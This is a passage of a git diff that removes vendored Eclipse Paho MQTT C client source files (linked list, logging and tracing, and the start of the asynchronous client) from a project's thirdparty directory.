-	while (aList->first != NULL)
-	{
-		ListElement* first = aList->first;
-		aList->first = first->next;
-		free(first);
-	}
-	free(aList);
-}
-
-
-/**
- * Forward iteration through a list
- * @param aList the list to which the operation is to be applied
- * @param pos pointer to the current position in the list.  NULL means start from the beginning of the list
- * This is updated on return to the same value as that returned from this function
- * @return pointer to the current list element
- */
-ListElement* ListNextElement(List* aList, ListElement** pos)
-{
-	return *pos = (*pos == NULL) ? aList->first : (*pos)->next;
-}
-
-
-/**
- * Backward iteration through a list
- * @param aList the list to which the operation is to be applied
- * @param pos pointer to the current position in the list.  NULL means start from the end of the list
- * This is updated on return to the same value as that returned from this function
- * @return pointer to the current list element
- */
-ListElement* ListPrevElement(List* aList, ListElement** pos)
-{
-	return *pos = (*pos == NULL) ? aList->last : (*pos)->prev;
-}
-
-
-/**
- * List callback function for comparing integers
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int intcompare(void* a, void* b)
-{
-	return *((int*)a) == *((int*)b);
-}
-
-
-/**
- * List callback function for comparing C strings
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int stringcompare(void* a, void* b)
-{
-	return strcmp((char*)a, (char*)b) == 0;
-}
-
-
-#if defined(UNIT_TESTS)
-
-
-int main(int argc, char *argv[])
-{
-	int i, *ip, *todelete;
-	ListElement* current = NULL;
-	List* l = ListInitialize();
-	printf("List initialized\n");
-
-	for (i = 0; i < 10; i++)
-	{
-		ip = malloc(sizeof(int));
-		*ip = i;
-		ListAppend(l, (void*)ip, sizeof(int));
-		if (i==5)
-			todelete = ip;
-		printf("List element appended %d\n",  *((int*)(l->last->content)));
-	}
-
-	printf("List contents:\n");
-	current = NULL;
-	while (ListNextElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	printf("List contents in reverse order:\n");
-	current = NULL;
-	while (ListPrevElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	/* if ListFindItem(l, *ip, intcompare)->content */
-
-	printf("List contents having deleted element %d:\n", *todelete);
-	ListRemove(l, todelete);
-	current = NULL;
-	while (ListNextElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	i = 9;
-	ListRemoveItem(l, &i, intcompare);
-	printf("List contents having deleted another element, %d, size now %d:\n", i, l->size);
-	current = NULL;
-	while (ListNextElement(l, &current) != NULL)
-		printf("List element: %d\n", *((int*)(current->content)));
-
-	ListFree(l);
-	printf("List freed\n");
-}
-
-#endif
-
-
-
-
-
diff --git a/thirdparty/paho.mqtt.c/src/LinkedList.h b/thirdparty/paho.mqtt.c/src/LinkedList.h
deleted file mode 100644
index 102a4fd..0000000
--- a/thirdparty/paho.mqtt.c/src/LinkedList.h
+++ /dev/null
@@ -1,105 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *    Ian Craggs - change size types from int to size_t
- *******************************************************************************/
-
-#if !defined(LINKEDLIST_H)
-#define LINKEDLIST_H
-
-#include <stdlib.h> /* for size_t definition */
-
-/*BE
-defm defList(T)
-
-def T concat Item
-{
-	at 4
-	n32 ptr T concat Item suppress "next"
-	at 0
-	n32 ptr T concat Item suppress "prev"
-	at 8
-	n32 ptr T id2str(T)
-}
-
-def T concat List
-{
-	n32 ptr T concat Item suppress "first"
-	n32 ptr T concat Item suppress "last"
-	n32 ptr T concat Item suppress "current"
-	n32 dec "count"
-	n32 suppress "size"
-}
-endm
-
-defList(INT)
-defList(STRING)
-defList(TMP)
-
-BE*/
-
-/**
- * Structure to hold all data for one list element
- */
-typedef struct ListElementStruct
-{
-	struct ListElementStruct *prev, /**< pointer to previous list element */
-							*next;	/**< pointer to next list element */
-	void* content;					/**< pointer to element content */
-} ListElement;
-
-
-/**
- * Structure to hold all data for one list
- */
-typedef struct
-{
-	ListElement *first,	/**< first element in the list */
-				*last,	/**< last element in the list */
-				*current;	/**< current element in the list, for iteration */
-	int count;  /**< no of items */
-	size_t size;  /**< heap storage used */
-} List;
-
-void ListZero(List*);
-List* ListInitialize(void);
-
-void ListAppend(List* aList, void* content, size_t size);
-void ListAppendNoMalloc(List* aList, void* content, ListElement* newel, size_t size);
-void ListInsert(List* aList, void* content, size_t size, ListElement* index);
-
-int ListRemove(List* aList, void* content);
-int ListRemoveItem(List* aList, void* content, int(*callback)(void*, void*));
-void* ListDetachHead(List* aList);
-int ListRemoveHead(List* aList);
-void* ListPopTail(List* aList);
-
-int ListDetach(List* aList, void* content);
-int ListDetachItem(List* aList, void* content, int(*callback)(void*, void*));
-
-void ListFree(List* aList);
-void ListEmpty(List* aList);
-void ListFreeNoContent(List* aList);
-
-ListElement* ListNextElement(List* aList, ListElement** pos);
-ListElement* ListPrevElement(List* aList, ListElement** pos);
-
-ListElement* ListFind(List* aList, void* content);
-ListElement* ListFindItem(List* aList, void* content, int(*callback)(void*, void*));
-
-int intcompare(void* a, void* b);
-int stringcompare(void* a, void* b);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Log.c b/thirdparty/paho.mqtt.c/src/Log.c
deleted file mode 100644
index 472e888..0000000
--- a/thirdparty/paho.mqtt.c/src/Log.c
+++ /dev/null
@@ -1,572 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *    Ian Craggs - fix for bug #427028
- *******************************************************************************/
-
-/**
- * @file
- * \brief Logging and tracing module
- *
- * 
- */
-
-#include "Log.h"
-#include "MQTTPacket.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolClient.h"
-#include "Messages.h"
-#include "LinkedList.h"
-#include "StackTrace.h"
-#include "Thread.h"
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <stdarg.h>
-#include <time.h>
-#include <string.h>
-
-#if !defined(WIN32) && !defined(WIN64)
-#include <syslog.h>
-#include <sys/stat.h>
-#define GETTIMEOFDAY 1
-#else
-#define snprintf _snprintf
-#endif
-
-#if defined(GETTIMEOFDAY)
-	#include <sys/time.h>
-#else
-	#include <sys/timeb.h>
-#endif
-
-#if !defined(WIN32) && !defined(WIN64)
-/**
- * _unlink mapping for linux
- */
-#define _unlink unlink
-#endif
-
-
-#if !defined(min)
-#define min(A,B) ( (A) < (B) ? (A):(B))
-#endif
-
-trace_settings_type trace_settings =
-{
-	TRACE_MINIMUM,
-	400,
-	INVALID_LEVEL
-};
-
-#define MAX_FUNCTION_NAME_LENGTH 256
-
-typedef struct
-{
-#if defined(GETTIMEOFDAY)
-	struct timeval ts;
-#else
-	struct timeb ts;
-#endif
-	int sametime_count;
-	int number;
-	int thread_id;
-	int depth;
-	char name[MAX_FUNCTION_NAME_LENGTH + 1];
-	int line;
-	int has_rc;
-	int rc;
-	enum LOG_LEVELS level;
-} traceEntry;
-
-static int start_index = -1,
-			next_index = 0;
-static traceEntry* trace_queue = NULL;
-static int trace_queue_size = 0;
-
-static FILE* trace_destination = NULL;	/**< flag to indicate if trace is to be sent to a stream */
-static char* trace_destination_name = NULL; /**< the name of the trace file */
-static char* trace_destination_backup_name = NULL; /**< the name of the backup trace file */
-static int lines_written = 0; /**< number of lines written to the current output file */
-static int max_lines_per_file = 1000; /**< maximum number of lines to write to one trace file */
-static enum LOG_LEVELS trace_output_level = INVALID_LEVEL;
-static Log_traceCallback* trace_callback = NULL;
-static traceEntry* Log_pretrace(void);
-static char* Log_formatTraceEntry(traceEntry* cur_entry);
-static void Log_output(enum LOG_LEVELS log_level, const char *msg);
-static void Log_posttrace(enum LOG_LEVELS log_level, traceEntry* cur_entry);
-static void Log_trace(enum LOG_LEVELS log_level, const char *buf);
-#if 0
-static FILE* Log_destToFile(const char *dest);
-static int Log_compareEntries(const char *entry1, const char *entry2);
-#endif
-
-static int sametime_count = 0;
-#if defined(GETTIMEOFDAY)
-struct timeval ts, last_ts;
-#else
-struct timeb ts, last_ts;
-#endif
-static char msg_buf[512];
-
-#if defined(WIN32) || defined(WIN64)
-mutex_type log_mutex;
-#else
-static pthread_mutex_t log_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type log_mutex = &log_mutex_store;
-#endif
-
-
-int Log_initialize(Log_nameValue* info)
-{
-	int rc = -1;
-	char* envval = NULL;
-
-	if ((trace_queue = malloc(sizeof(traceEntry) * trace_settings.max_trace_entries)) == NULL)
-		return rc;
-	trace_queue_size = trace_settings.max_trace_entries;
-
-	if ((envval = getenv("MQTT_C_CLIENT_TRACE")) != NULL && strlen(envval) > 0)
-	{
-		if (strcmp(envval, "ON") == 0 || (trace_destination = fopen(envval, "w")) == NULL)
-			trace_destination = stdout;
-		else
-		{
-			trace_destination_name = malloc(strlen(envval) + 1);
-			strcpy(trace_destination_name, envval);
-			trace_destination_backup_name = malloc(strlen(envval) + 3);
-			sprintf(trace_destination_backup_name, "%s.0", trace_destination_name);
-		}
-	}
-	if ((envval = getenv("MQTT_C_CLIENT_TRACE_MAX_LINES")) != NULL && strlen(envval) > 0)
-	{
-		max_lines_per_file = atoi(envval);
-		if (max_lines_per_file <= 0)
-			max_lines_per_file = 1000;
-	}
-	if ((envval = getenv("MQTT_C_CLIENT_TRACE_LEVEL")) != NULL && strlen(envval) > 0)
-	{
-		if (strcmp(envval, "MAXIMUM") == 0 || strcmp(envval, "TRACE_MAXIMUM") == 0)
-			trace_settings.trace_level = TRACE_MAXIMUM;
-		else if (strcmp(envval, "MEDIUM") == 0 || strcmp(envval, "TRACE_MEDIUM") == 0)
-			trace_settings.trace_level = TRACE_MEDIUM;
-		else if (strcmp(envval, "MINIMUM") == 0 || strcmp(envval, "TRACE_MEDIUM") == 0)
-			trace_settings.trace_level = TRACE_MINIMUM;
-		else if (strcmp(envval, "PROTOCOL") == 0  || strcmp(envval, "TRACE_PROTOCOL") == 0)
-			trace_output_level = TRACE_PROTOCOL;
-		else if (strcmp(envval, "ERROR") == 0  || strcmp(envval, "TRACE_ERROR") == 0)
-			trace_output_level = LOG_ERROR;
-	}
-	Log_output(TRACE_MINIMUM, "=========================================================");
-	Log_output(TRACE_MINIMUM, "                   Trace Output");
-	if (info)
-	{
-		while (info->name)
-		{
-			snprintf(msg_buf, sizeof(msg_buf), "%s: %s", info->name, info->value);
-			Log_output(TRACE_MINIMUM, msg_buf);
-			info++;
-		}
-	}
-#if !defined(WIN32) && !defined(WIN64)
-	struct stat buf;
-	if (stat("/proc/version", &buf) != -1)
-	{
-		FILE* vfile;
-		
-		if ((vfile = fopen("/proc/version", "r")) != NULL)
-		{
-			int len;
-			
-			strcpy(msg_buf, "/proc/version: ");
-			len = strlen(msg_buf);
-			if (fgets(&msg_buf[len], sizeof(msg_buf) - len, vfile))
-				Log_output(TRACE_MINIMUM, msg_buf);
-			fclose(vfile);
-		}
-	}
-#endif
-	Log_output(TRACE_MINIMUM, "=========================================================");
-		
-	return rc;
-}
-
-
-void Log_setTraceCallback(Log_traceCallback* callback)
-{
-	trace_callback = callback;
-}
-
-
-void Log_setTraceLevel(enum LOG_LEVELS level)
-{
-	if (level < TRACE_MINIMUM) /* the lowest we can go is TRACE_MINIMUM*/
-		trace_settings.trace_level = level;
-	trace_output_level = level;
-}
-
-
-void Log_terminate(void)
-{
-	free(trace_queue);
-	trace_queue = NULL;
-	trace_queue_size = 0;
-	if (trace_destination)
-	{
-		if (trace_destination != stdout)
-			fclose(trace_destination);
-		trace_destination = NULL;
-	}
-	if (trace_destination_name) {
-		free(trace_destination_name);
-		trace_destination_name = NULL;
-	}
-	if (trace_destination_backup_name) {
-		free(trace_destination_backup_name);
-		trace_destination_backup_name = NULL;
-	}
-	start_index = -1;
-	next_index = 0;
-	trace_output_level = INVALID_LEVEL;
-	sametime_count = 0;
-}
-
-
-static traceEntry* Log_pretrace(void)
-{
-	traceEntry *cur_entry = NULL;
-
-	/* calling ftime/gettimeofday seems to be comparatively expensive, so we need to limit its use */
-	if (++sametime_count % 20 == 0)
-	{
-#if defined(GETTIMEOFDAY)
-		gettimeofday(&ts, NULL);
-		if (ts.tv_sec != last_ts.tv_sec || ts.tv_usec != last_ts.tv_usec)
-#else
-		ftime(&ts);
-		if (ts.time != last_ts.time || ts.millitm != last_ts.millitm)
-#endif
-		{
-			sametime_count = 0;
-			last_ts = ts;
-		}
-	}
-
-	if (trace_queue_size != trace_settings.max_trace_entries)
-	{
-		traceEntry* new_trace_queue = malloc(sizeof(traceEntry) * trace_settings.max_trace_entries);
-
-		memcpy(new_trace_queue, trace_queue, min(trace_queue_size, trace_settings.max_trace_entries) * sizeof(traceEntry));
-		free(trace_queue);
-		trace_queue = new_trace_queue;
-		trace_queue_size = trace_settings.max_trace_entries;
-
-		if (start_index > trace_settings.max_trace_entries + 1 ||
-				next_index > trace_settings.max_trace_entries + 1)
-		{
-			start_index = -1;
-			next_index = 0;
-		}
-	}
-
-	/* add to trace buffer */
-	cur_entry = &trace_queue[next_index];
-	if (next_index == start_index) /* means the buffer is full */
-	{
-		if (++start_index == trace_settings.max_trace_entries)
-			start_index = 0;
-	} else if (start_index == -1)
-		start_index = 0;
-	if (++next_index == trace_settings.max_trace_entries)
-		next_index = 0;
-
-	return cur_entry;
-}
-
-static char* Log_formatTraceEntry(traceEntry* cur_entry)
-{
-	struct tm *timeinfo;
-	int buf_pos = 31;
-
-#if defined(GETTIMEOFDAY)
-	timeinfo = localtime((time_t *)&cur_entry->ts.tv_sec);
-#else
-	timeinfo = localtime(&cur_entry->ts.time);
-#endif
-	strftime(&msg_buf[7], 80, "%Y%m%d %H%M%S ", timeinfo);
-#if defined(GETTIMEOFDAY)
-	sprintf(&msg_buf[22], ".%.3lu ", cur_entry->ts.tv_usec / 1000L);
-#else
-	sprintf(&msg_buf[22], ".%.3hu ", cur_entry->ts.millitm);
-#endif
-	buf_pos = 27;
-
-	sprintf(msg_buf, "(%.4d)", cur_entry->sametime_count);
-	msg_buf[6] = ' ';
-
-	if (cur_entry->has_rc == 2)
-		strncpy(&msg_buf[buf_pos], cur_entry->name, sizeof(msg_buf)-buf_pos);
-	else
-	{
-		const char *format = Messages_get(cur_entry->number, cur_entry->level);
-		if (cur_entry->has_rc == 1)
-			snprintf(&msg_buf[buf_pos], sizeof(msg_buf)-buf_pos, format, cur_entry->thread_id,
-					cur_entry->depth, "", cur_entry->depth, cur_entry->name, cur_entry->line, cur_entry->rc);
-		else
-			snprintf(&msg_buf[buf_pos], sizeof(msg_buf)-buf_pos, format, cur_entry->thread_id,
-					cur_entry->depth, "", cur_entry->depth, cur_entry->name, cur_entry->line);
-	}
-	return msg_buf;
-}
-
-
-static void Log_output(enum LOG_LEVELS log_level, const char *msg)
-{
-	if (trace_destination)
-	{
-		fprintf(trace_destination, "%s\n", msg);
-
-		if (trace_destination != stdout && ++lines_written >= max_lines_per_file)
-		{	
-
-			fclose(trace_destination);		
-			_unlink(trace_destination_backup_name); /* remove any old backup trace file */
-			rename(trace_destination_name, trace_destination_backup_name); /* rename recently closed to backup */
-			trace_destination = fopen(trace_destination_name, "w"); /* open new trace file */
-			if (trace_destination == NULL)
-				trace_destination = stdout;
-			lines_written = 0;
-		}
-		else
-			fflush(trace_destination);
-	}
-		
-	if (trace_callback)
-		(*trace_callback)(log_level, msg);
-}
-
-
-static void Log_posttrace(enum LOG_LEVELS log_level, traceEntry* cur_entry)
-{
-	if (((trace_output_level == -1) ? log_level >= trace_settings.trace_level : log_level >= trace_output_level))
-	{
-		char* msg = NULL;
-		
-		if (trace_destination || trace_callback)
-			msg = &Log_formatTraceEntry(cur_entry)[7];
-		
-		Log_output(log_level, msg);
-	}
-}
-
-
-static void Log_trace(enum LOG_LEVELS log_level, const char *buf)
-{
-	traceEntry *cur_entry = NULL;
-
-	if (trace_queue == NULL)
-		return;
-
-	cur_entry = Log_pretrace();
-
-	memcpy(&(cur_entry->ts), &ts, sizeof(ts));
-	cur_entry->sametime_count = sametime_count;
-
-	cur_entry->has_rc = 2;
-	strncpy(cur_entry->name, buf, sizeof(cur_entry->name));
-	cur_entry->name[MAX_FUNCTION_NAME_LENGTH] = '\0';
-
-	Log_posttrace(log_level, cur_entry);
-}
-
-
-/**
- * Log a message.  If possible, all messages should be indexed by message number, and
- * the use of the format string should be minimized or negated altogether.  If format is
- * provided, the message number is only used as a message label.
- * @param log_level the log level of the message
- * @param msgno the id of the message to use if the format string is NULL
- * @param aFormat the printf format string to be used if the message id does not exist
- * @param ... the printf inserts
- */
-void Log(enum LOG_LEVELS log_level, int msgno, const char *format, ...)
-{
-	if (log_level >= trace_settings.trace_level)
-	{
-		const char *temp = NULL;
-		static char msg_buf[512];
-		va_list args;
-
-		/* we're using a static character buffer, so we need to make sure only one thread uses it at a time */
-		Thread_lock_mutex(log_mutex); 
-		if (format == NULL && (temp = Messages_get(msgno, log_level)) != NULL)
-			format = temp;
-
-		va_start(args, format);
-		vsnprintf(msg_buf, sizeof(msg_buf), format, args);
-
-		Log_trace(log_level, msg_buf);
-		va_end(args);
-		Thread_unlock_mutex(log_mutex); 
-	}
-
-	/*if (log_level >= LOG_ERROR)
-	{
-		char* filename = NULL;
-		Log_recordFFDC(&msg_buf[7]);
-	}
-	*/
-}
-
-
-/**
- * The reason for this function is to make trace logging as fast as possible so that the
- * function exit/entry history can be captured by default without unduly impacting
- * performance.  Therefore it must do as little as possible.
- * @param log_level the log level of the message
- * @param msgno the id of the message to use if the format string is NULL
- * @param aFormat the printf format string to be used if the message id does not exist
- * @param ... the printf inserts
- */
-void Log_stackTrace(enum LOG_LEVELS log_level, int msgno, int thread_id, int current_depth, const char* name, int line, int* rc)
-{
-	traceEntry *cur_entry = NULL;
-
-	if (trace_queue == NULL)
-		return;
-
-	if (log_level < trace_settings.trace_level)
-		return;
-
-	Thread_lock_mutex(log_mutex);
-	cur_entry = Log_pretrace();
-
-	memcpy(&(cur_entry->ts), &ts, sizeof(ts));
-	cur_entry->sametime_count = sametime_count;
-	cur_entry->number = msgno;
-	cur_entry->thread_id = thread_id;
-	cur_entry->depth = current_depth;
-	strcpy(cur_entry->name, name);
-	cur_entry->level = log_level;
-	cur_entry->line = line;
-	if (rc == NULL)
-		cur_entry->has_rc = 0;
-	else
-	{
-		cur_entry->has_rc = 1;
-		cur_entry->rc = *rc;
-	}
-
-	Log_posttrace(log_level, cur_entry);
-	Thread_unlock_mutex(log_mutex);
-}
-
-
-#if 0
-static FILE* Log_destToFile(const char *dest)
-{
-	FILE* file = NULL;
-
-	if (strcmp(dest, "stdout") == 0)
-		file = stdout;
-	else if (strcmp(dest, "stderr") == 0)
-		file = stderr;
-	else
-	{
-		if (strstr(dest, "FFDC"))
-			file = fopen(dest, "ab");
-		else
-			file = fopen(dest, "wb");
-	}
-	return file;
-}
-
-
-static int Log_compareEntries(const char *entry1, const char *entry2)
-{
-	int comp = strncmp(&entry1[7], &entry2[7], 19);
-
-	/* if timestamps are equal, use the sequence numbers */
-	if (comp == 0)
-		comp = strncmp(&entry1[1], &entry2[1], 4);
-
-	return comp;
-}
-
-
-/**
- * Write the contents of the stored trace to a stream
- * @param dest string which contains a file name or the special strings stdout or stderr
- */
-int Log_dumpTrace(char* dest)
-{
-	FILE* file = NULL;
-	ListElement* cur_trace_entry = NULL;
-	const int msgstart = 7;
-	int rc = -1;
-	int trace_queue_index = 0;
-
-	if ((file = Log_destToFile(dest)) == NULL)
-	{
-		Log(LOG_ERROR, 9, NULL, "trace", dest, "trace entries");
-		goto exit;
-	}
-
-	fprintf(file, "=========== Start of trace dump ==========\n");
-	/* Interleave the log and trace entries together appropriately */
-	ListNextElement(trace_buffer, &cur_trace_entry);
-	trace_queue_index = start_index;
-	if (trace_queue_index == -1)
-		trace_queue_index = next_index;
-	else
-	{
-		Log_formatTraceEntry(&trace_queue[trace_queue_index++]);
-		if (trace_queue_index == trace_settings.max_trace_entries)
-			trace_queue_index = 0;
-	}
-	while (cur_trace_entry || trace_queue_index != next_index)
-	{
-		if (cur_trace_entry && trace_queue_index != -1)
-		{	/* compare these timestamps */
-			if (Log_compareEntries((char*)cur_trace_entry->content, msg_buf) > 0)
-				cur_trace_entry = NULL;
-		}
-
-		if (cur_trace_entry)
-		{
-			fprintf(file, "%s\n", &((char*)(cur_trace_entry->content))[msgstart]);
-			ListNextElement(trace_buffer, &cur_trace_entry);
-		}
-		else
-		{
-			fprintf(file, "%s\n", &msg_buf[7]);
-			if (trace_queue_index != next_index)
-			{
-				Log_formatTraceEntry(&trace_queue[trace_queue_index++]);
-				if (trace_queue_index == trace_settings.max_trace_entries)
-					trace_queue_index = 0;
-			}
-		}
-	}
-	fprintf(file, "========== End of trace dump ==========\n\n");
-	if (file != stdout && file != stderr && file != NULL)
-		fclose(file);
-	rc = 0;
-exit:
-	return rc;
-}
-#endif
-
-
diff --git a/thirdparty/paho.mqtt.c/src/Log.h b/thirdparty/paho.mqtt.c/src/Log.h
deleted file mode 100644
index 455beb6..0000000
--- a/thirdparty/paho.mqtt.c/src/Log.h
+++ /dev/null
@@ -1,85 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2013 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - updates for the async client
- *******************************************************************************/
-
-#if !defined(LOG_H)
-#define LOG_H
-
-/*BE
-map LOG_LEVELS
-{
-	"TRACE_MAXIMUM" 1
-	"TRACE_MEDIUM" 2
-	"TRACE_MINIMUM" 3
-	"TRACE_PROTOCOL" 4
-
-	"ERROR" 5
-	"SEVERE" 6
-	"FATAL" 7
-}
-BE*/
-
-enum LOG_LEVELS {
-	INVALID_LEVEL = -1,
-	TRACE_MAXIMUM = 1,
-	TRACE_MEDIUM,
-	TRACE_MINIMUM,
-	TRACE_PROTOCOL,
-	LOG_ERROR,
-	LOG_SEVERE,
-	LOG_FATAL,
-};
-
-
-/*BE
-def trace_settings_type
-{
-   n32 map LOG_LEVELS "trace_level"
-   n32 dec "max_trace_entries"
-   n32 dec "trace_output_level"
-}
-BE*/
-typedef struct
-{
-	enum LOG_LEVELS trace_level;	/**< trace level */
-	int max_trace_entries;		/**< max no of entries in the trace buffer */
-	enum LOG_LEVELS trace_output_level;		/**< trace level to output to destination */
-} trace_settings_type;
-
-extern trace_settings_type trace_settings;
-
-#define LOG_PROTOCOL TRACE_PROTOCOL
-#define TRACE_MAX TRACE_MAXIMUM
-#define TRACE_MIN TRACE_MINIMUM
-#define TRACE_MED TRACE_MEDIUM
-
-typedef struct
-{
-	const char* name;
-	const char* value;
-} Log_nameValue;
-
-int Log_initialize(Log_nameValue*);
-void Log_terminate(void);
-
-void Log(enum LOG_LEVELS, int, const char *, ...);
-void Log_stackTrace(enum LOG_LEVELS, int, int, int, const char*, int, int*);
-
-typedef void Log_traceCallback(enum LOG_LEVELS level, const char *message);
-void Log_setTraceCallback(Log_traceCallback* callback);
-void Log_setTraceLevel(enum LOG_LEVELS level);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTAsync.c b/thirdparty/paho.mqtt.c/src/MQTTAsync.c
deleted file mode 100644
index 87a1088..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTAsync.c
+++ /dev/null
@@ -1,3227 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL support
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - fix for bug 415042 - using already freed structure
- *    Ian Craggs - fix for bug 419233 - mutexes not reporting errors
- *    Ian Craggs - fix for bug 420851
- *    Ian Craggs - fix for bug 432903 - queue persistence
- *    Ian Craggs - MQTT 3.1.1 support
- *    Rong Xiang, Ian Craggs - C++ compatibility
- *    Ian Craggs - fix for bug 442400: reconnecting after network cable unplugged
- *    Ian Craggs - fix for bug 444934 - incorrect free in freeCommand1
- *    Ian Craggs - fix for bug 445891 - assigning msgid is not thread safe
- *    Ian Craggs - fix for bug 465369 - longer latency than expected
- *    Ian Craggs - fix for bug 444103 - success/failure callbacks not invoked
- *    Ian Craggs - fix for bug 484363 - segfault in getReadySocket
- *    Ian Craggs - automatic reconnect and offline buffering (send while disconnected)
- *    Ian Craggs - fix for bug 472250
- *    Ian Craggs - fix for bug 486548
- *    Ian Craggs - SNI support
- *    Ian Craggs - auto reconnect timing fix #218
- *    Ian Craggs - fix for issue #190
- *******************************************************************************/
-
-/**
- * @file
- * \brief Asynchronous API implementation
- *
- */
-
-#define _GNU_SOURCE /* for pthread_mutexattr_settype */
-#include <stdlib.h>
-#include <string.h>
-#if !defined(WIN32) && !defined(WIN64)
-	#include <sys/time.h>
-#endif
-
-#if !defined(NO_PERSISTENCE)
-#include "MQTTPersistence.h"
-#endif
-#include "MQTTAsync.h"
-#include "utf-8.h"
-#include "MQTTProtocol.h"
-#include "MQTTProtocolOut.h"
-#include "Thread.h"
-#include "SocketBuffer.h"
-#include "StackTrace.h"
-#include "Heap.h"
-#include "OsWrapper.h"
-
-#define URI_TCP "tcp://"
-
-#include "VersionInfo.h"
-
-const char *client_timestamp_eye = "MQTTAsyncV3_Timestamp " BUILD_TIMESTAMP;
-const char *client_version_eye = "MQTTAsyncV3_Version " CLIENT_VERSION;
-
-void MQTTAsync_global_init(MQTTAsync_init_options* inits)
-{
-#if defined(OPENSSL)
-	SSLSocket_handleOpensslInit(inits->do_openssl_init);
-#endif
-}
-
-#if !defined(min)
-#define min(a, b) (((a) < (b)) ? (a) : (b))
-#endif
-
-static ClientStates ClientState =
-{
-	CLIENT_VERSION, /* version */
-	NULL /* client list */
-};
-
-ClientStates* bstate = &ClientState;
-
-MQTTProtocol state;
-
-enum MQTTAsync_threadStates
-{
-	STOPPED, STARTING, RUNNING, STOPPING
-};
-
-enum MQTTAsync_threadStates sendThread_state = STOPPED;
-enum MQTTAsync_threadStates receiveThread_state = STOPPED;
-static thread_id_type sendThread_id = 0,
-					receiveThread_id = 0;
-
-#if defined(WIN32) || defined(WIN64)
-static mutex_type mqttasync_mutex = NULL;
-static mutex_type socket_mutex = NULL;
-static mutex_type mqttcommand_mutex = NULL;
-static sem_type send_sem = NULL;
-extern mutex_type stack_mutex;
-extern mutex_type heap_mutex;
-extern mutex_type log_mutex;
-BOOL APIENTRY DllMain(HANDLE hModule,
-					  DWORD  ul_reason_for_call,
-					  LPVOID lpReserved)
-{
-	switch (ul_reason_for_call)
-	{
-		case DLL_PROCESS_ATTACH:
-			Log(TRACE_MAX, -1, "DLL process attach");
-			if (mqttasync_mutex == NULL)
-			{
-				mqttasync_mutex = CreateMutex(NULL, 0, NULL);
-				mqttcommand_mutex = CreateMutex(NULL, 0, NULL);
-				send_sem = CreateEvent(
-		        NULL,               /* default security attributes */
-		        FALSE,              /* manual-reset event? */
-		        FALSE,              /* initial state is nonsignaled */
-		        NULL                /* object name */
-		        );
-				stack_mutex = CreateMutex(NULL, 0, NULL);
-				heap_mutex = CreateMutex(NULL, 0, NULL);
-				log_mutex = CreateMutex(NULL, 0, NULL);
-				socket_mutex = CreateMutex(NULL, 0, NULL);
-			}
-		case DLL_THREAD_ATTACH:
-			Log(TRACE_MAX, -1, "DLL thread attach");
-		case DLL_THREAD_DETACH:
-			Log(TRACE_MAX, -1, "DLL thread detach");
-		case DLL_PROCESS_DETACH:
-			Log(TRACE_MAX, -1, "DLL process detach");
-	}
-	return TRUE;
-}
-#else
-static pthread_mutex_t mqttasync_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type mqttasync_mutex = &mqttasync_mutex_store;
-
-static pthread_mutex_t socket_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type socket_mutex = &socket_mutex_store;
-
-static pthread_mutex_t mqttcommand_mutex_store = PTHREAD_MUTEX_INITIALIZER;
-static mutex_type mqttcommand_mutex = &mqttcommand_mutex_store;
-
-static cond_type_struct send_cond_store = { PTHREAD_COND_INITIALIZER, PTHREAD_MUTEX_INITIALIZER };
-static cond_type send_cond = &send_cond_store;
-
-void MQTTAsync_init(void)
-{
-	pthread_mutexattr_t attr;
-	int rc;
-
-	pthread_mutexattr_init(&attr);
-#if !defined(_WRS_KERNEL)
